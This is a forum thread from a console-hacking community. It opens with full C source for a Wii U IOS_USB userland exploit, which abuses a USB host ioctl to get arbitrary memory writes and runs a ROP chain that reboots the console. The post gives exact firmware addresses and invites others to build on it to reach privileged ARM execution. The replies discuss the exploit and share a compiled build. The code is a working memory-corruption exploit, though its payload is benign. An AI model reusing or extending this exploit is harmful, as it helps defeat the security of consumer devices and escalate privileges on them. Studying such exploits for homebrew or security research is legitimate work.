ROP from within IOS_USB (5.5.1)

Discussion in 'Wii U - Hacking & Backup Loaders' started by Hillary_Clinton, Oct 8, 2016.

  1. Hillary_Clinton
    OP

    Hillary_Clinton Member

    Newcomer
    23
    129
    Apr 23, 2016
    United States
    IOSU kernel exploit demonstrated here. This is just for people who would like to experiment inside IOSU. You can ignore the text below; it's old.

    Hi guys. Below is an implementation of the userland IOSU exploit on the wiki. It demonstrates a simple ROP chain which will call the shutdown syscall from within IOS_USB and restart your console. (5.5.1 only.) I'm posting this here in the hope that someone might build on this and get privileged execution on the ARM, perhaps by implementing the IOS_CreateThread exploit that is detailed on the wiki, and then share it publicly.

    How this works is described in detail on the wiki but you might like to know that the ROP chain overwrites the return address for the subroutine at 0x1011D968. The return address is at 0x1016AD40. The thread's stack is within the range [0x1015AE50, 0x1016AE50). You might also like to know that MEM1 is mapped R/W on the PPC side at 0xF4000000 and on the ARM side at 0x00000000.

    Updated code here. The rest of the old post:

    The trouble I'm having right now is I am unable to construct a larger ROP chain without it being overwritten between calls to write32. I've tried lots of different ways of moving the stack pointer around but I haven't had much luck. And of course I know there are people who have already achieved privileged execution on the ARM, but this is for the people who are waiting.

    Here's what I have.

    loader.c:
    Code:
    #include "loader.h"
    
    void _start()
    {
        /* Load a good stack */
        asm(
            "lis %r1, 0x1ab5 ;"
            "ori %r1, %r1, 0xd138 ;"
        );
    
        unsigned int coreinit_handle;
        OSDynLoad_Acquire("coreinit.rpl", &coreinit_handle);
    
        void(*_Exit)();
        OSDynLoad_FindExport(coreinit_handle, 0, "_Exit", &_Exit);
    
        void(*OSSleepTicks)(long long x);
        OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks);
    
        int(*IOS_Open)(char *path, unsigned int mode);
        OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Open", &IOS_Open);
    
        int(*IOS_Close)(int fd);
        OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Close", &IOS_Close);
    
        int du0h = IOS_Open("/dev/uhs/0", 0);
    
        //int ret = write32(du0h, 0x1016BE50 - 0xF0, 0x1012EE5C); // reset syscall
    
    #define CHAIN_START 0x1016AD40
    #define SHUTDOWN 0x1012EE4C
    #define SIMPLE_RETURN 0x101014E4
    
        int ret;
    
        ret = write32(du0h, CHAIN_START + 0x4, SIMPLE_RETURN);
        ret = write32(du0h, CHAIN_START + 0x8, SHUTDOWN);
    
        // the following line will trigger the ROP chain
        ret = write32(du0h, CHAIN_START, SIMPLE_RETURN);
    
        IOS_Close(du0h);
    
        _Exit();
    
        while (1);
    }
    
    int write32(int dev_uhs_0_handle, int arm_addr, int val) {
    
        unsigned int coreinit_handle;
        OSDynLoad_Acquire("coreinit.rpl", &coreinit_handle);
    
        int(*IOS_Ioctl)(int fd, unsigned int request, void *input_buffer,
            unsigned int input_buffer_len, void *output_buffer, unsigned int output_buffer_len);
        void(*DCFlushRange)(void *addr, unsigned int len);
        void(*DCInvalidateRange)(void *addr, unsigned int len);
        void(*OSSleepTicks)(long long x);
        OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Ioctl", &IOS_Ioctl);
        OSDynLoad_FindExport(coreinit_handle, 0, "DCFlushRange", &DCFlushRange);
        OSDynLoad_FindExport(coreinit_handle, 0, "DCInvalidateRange", &DCInvalidateRange);
        OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks);
    
        int* pretend_root_hub = (int*)0xF5003ABC;
        int *ayylmao = (int*)0xF4500000;
    
        ayylmao[8] = (int)ayylmao - 0xF4000000;
        ayylmao[5] = 1;
        ayylmao[520] = arm_addr - 24; // the address to be overwritten, minus 24 bytes.
    
        pretend_root_hub[33] = (int)ayylmao - 0xF4000000;
        pretend_root_hub[78] = 0;
    
        DCFlushRange(pretend_root_hub + 33, 200);
        DCInvalidateRange(pretend_root_hub + 33, 200);
        DCFlushRange(ayylmao, 521 * 4);
        DCInvalidateRange(ayylmao, 521 * 4);
        OSSleepTicks(0x200000);
    
        int root_hub_index = -(0xBEA2C); // gets IOS_USB to read from the middle of MEM1
    
        int request_buffer[] = { root_hub_index, val };
        int output_buffer[32];
        int ret = IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));
        return ret;
    }
    loader.h:
    Code:
    #ifndef LOADER_H
    #define LOADER_H
    
    #include "../../../libwiiu/src/coreinit.h"
    #include "../../../libwiiu/src/socket.h"
    #include "../../../libwiiu/src/uhs.h"
    #include "../../../libwiiu/src/types.h"
    
    /* Application start */
    void _start();
    int write32(int, int, int);
    
    #endif /* LOADER_H */
    
     
    Last edited by Hillary_Clinton, Oct 14, 2016
    Azel, N28582R, Lankbald and 38 others like this.


  2. Filo97

    Filo97 Zelda's totally my sister! Not lying!

    Member
    3,637
    1,209
    Oct 8, 2015
    Italy
    Hyrule Castle
    wish so much i could have this homebrew, sometimes rebooting my console is the only thing i want to do.
     
    frogboy, lembi2001 and Subtle Demise like this.
  3. thisisallowed

    thisisallowed 中国御宅族

    Member
    488
    114
    Oct 8, 2015
    China
    Jinan, Shandong
    But it reboots it USING IOSU!!!!111
     
  4. CreeperMario

    CreeperMario GBAtemp Advanced Fan

    Member
    616
    364
    Jun 18, 2016
    Australia
    OSv10 v15702
    inb4 spam posts

    TAKE NOTE PEOPLE: THIS IS NOT AN IOSU EXPLOIT!
    It demonstrates code execution on the IOSU processor that can eventually lead to a kernel attack on the IOSU, but right now all it does is cold-boot (I think?) your console.
    It is like Browserhax - useful for basic stuff but you want a kernel exploit in order to have backups, HBL and extended memory access.
     
    CuriousTommy, Coc4tm and PokeAcer like this.
  5. thisisallowed

    thisisallowed 中国御宅族

    Member
    488
    114
    Oct 8, 2015
    China
    Jinan, Shandong
    You can't use this at all, pretty much.
    You need to use the keksploit to do anything. Other than rebooting.
     
  6. Voxel

    Voxel Clumsy Coder

    Member
    GBAtemp Patron
    Voxel is a Patron of GBAtemp and is helping us stay independent!

    Our Patreon
    5,183
    5,846
    Jun 27, 2015
    United Kingdom
    England, UK
    Huh, neat; this actually reboots my Wii U! Don't think I would use it in everyday use, but good job demonstrating Userland IOSU access. :)
     
    AHP_person likes this.
  7. Filo97

    Filo97 Zelda's totally my sister! Not lying!

    Member
    3,637
    1,209
    Oct 8, 2015
    Italy
    Hyrule Castle
    can i have a .elf of this? there are times when i just want to reboot console
     
  8. Voxel

    Voxel Clumsy Coder

    Member
    GBAtemp Patron
    Voxel is a Patron of GBAtemp and is helping us stay independent!

    Our Patreon
    5,183
    5,846
    Jun 27, 2015
    United Kingdom
    England, UK
    I don't think you can compile it as .elf, but I have the .mp4 (which is probably faster to execute anyway) if you want that.
     
  9. Filo97

    Filo97 Zelda's totally my sister! Not lying!

    Member
    3,637
    1,209
    Oct 8, 2015
    Italy
    Hyrule Castle
    no, thanks
     
  10. Voxel

    Voxel Clumsy Coder

    Member
    GBAtemp Patron
    Voxel is a Patron of GBAtemp and is helping us stay independent!

    Our Patreon
    5,183
    5,846
    Jun 27, 2015
    United Kingdom
    England, UK
    Why do you want the .elf then? Is it just so it matches with your collection of other elf files?
     
    leerz likes this.
  11. Filo97

    Filo97 Zelda's totally my sister! Not lying!

    Member
    3,637
    1,209
    Oct 8, 2015
    Italy
    Hyrule Castle
    no, it's because sometimes i just don't feel like leaving hbl open in RAM while playing games like super mario maker or anything that goes online
     
  12. CreeperMario

    CreeperMario GBAtemp Advanced Fan

    Member
    616
    364
    Jun 18, 2016
    Australia
    OSv10 v15702
    If you want an HBL port (may or may not work) I might try this now. Just let me try the userland version on my console first...
     
  13. Filo97

    Filo97 Zelda's totally my sister! Not lying!

    Member
    3,637
    1,209
    Oct 8, 2015
    Italy
    Hyrule Castle
    yay!
     
  14. CreeperMario

    CreeperMario GBAtemp Advanced Fan

    Member
    616
    364
    Jun 18, 2016
    Australia
    OSv10 v15702
    HBL port complete (it actually worked on my first build, that's never happened before...)
    Run this file using HBL - it can be streamed via wiiload, SendELF or can be placed inside the sd:/wiiu/apps/iosu-reboot/ folder on your SD Card.

    Enjoy rebooting your console I guess...? (I had to zip it, GBATemp wouldn't let me upload the raw ELF)

    @QuarkTheAwesome does this mean that we can add auto-rebooting to an exception handler? (You mentioned being able to return to the main thread before, but with limitations I can't remember).
     

    Attached Files:

    Last edited by CreeperMario, Oct 8, 2016
  15. Filo97

    Filo97 Zelda's totally my sister! Not lying!

    Member
    3,637
    1,209
    Oct 8, 2015
    Italy
    Hyrule Castle
    thx
     
  16. Cyan

    Cyan GBATemp's lurking knight

    Global Moderator
    18,076
    8,586
    Oct 27, 2002
    France
    Engine room, learning
    Go into Settings and exit. It soft-reboots the console when you exit and clear the hacks/HBL from memory.
     
  17. Filo97

    Filo97 Zelda's totally my sister! Not lying!

    Member
    3,637
    1,209
    Oct 8, 2015
    Italy
    Hyrule Castle
    ah so kinda like 3ds right?
     
    FlappyFalco likes this.
  18. Cyan

    Cyan GBATemp's lurking knight

    Global Moderator
    18,076
    8,586
    Oct 27, 2002
    France
    Engine room, learning
    I guess the HBL version he posted will be faster than loading/exiting the settings menu ;)

    @CreeperMario :
    maybe you could include your sources to compile it for HBL?
    it's just a makefile?


    I Added it to wikitemp.
     
  19. Phantom64

    Phantom64 Banned

    Banned
    581
    460
    Aug 18, 2015
    Saint Kitts and Nevis
    At this point i am waiting for a IOSU kernel exploit from Donald Trump.

    This is nosense. Someone called Hillary Clinton, registered today, released something quite hacky. Suspicious
     
    supermario18, Pachee, Froz and 9 others like this.
  20. QuarkTheAwesome

    QuarkTheAwesome Working for Hugs

    Member
    788
    1,929
    Apr 19, 2015
    Australia
    Stuck in the PowerPC
    Awesome to see! I hope this doesn't mean you're giving up on kernel...
    Sorry I was less help lately, ARM ROP is tough to get my head around :3

    @CreeperMario, you'll have to explain that differently since I'm not really sure what you mean. The work I did allowed homebrew apps to run exception handlers on their main threads (albeit with screwed-up stacks) which is much less restrictive than the default behavior. Not sure how it ties in here.

    (Also I seem to have stopped getting tag notifications. Hrm.)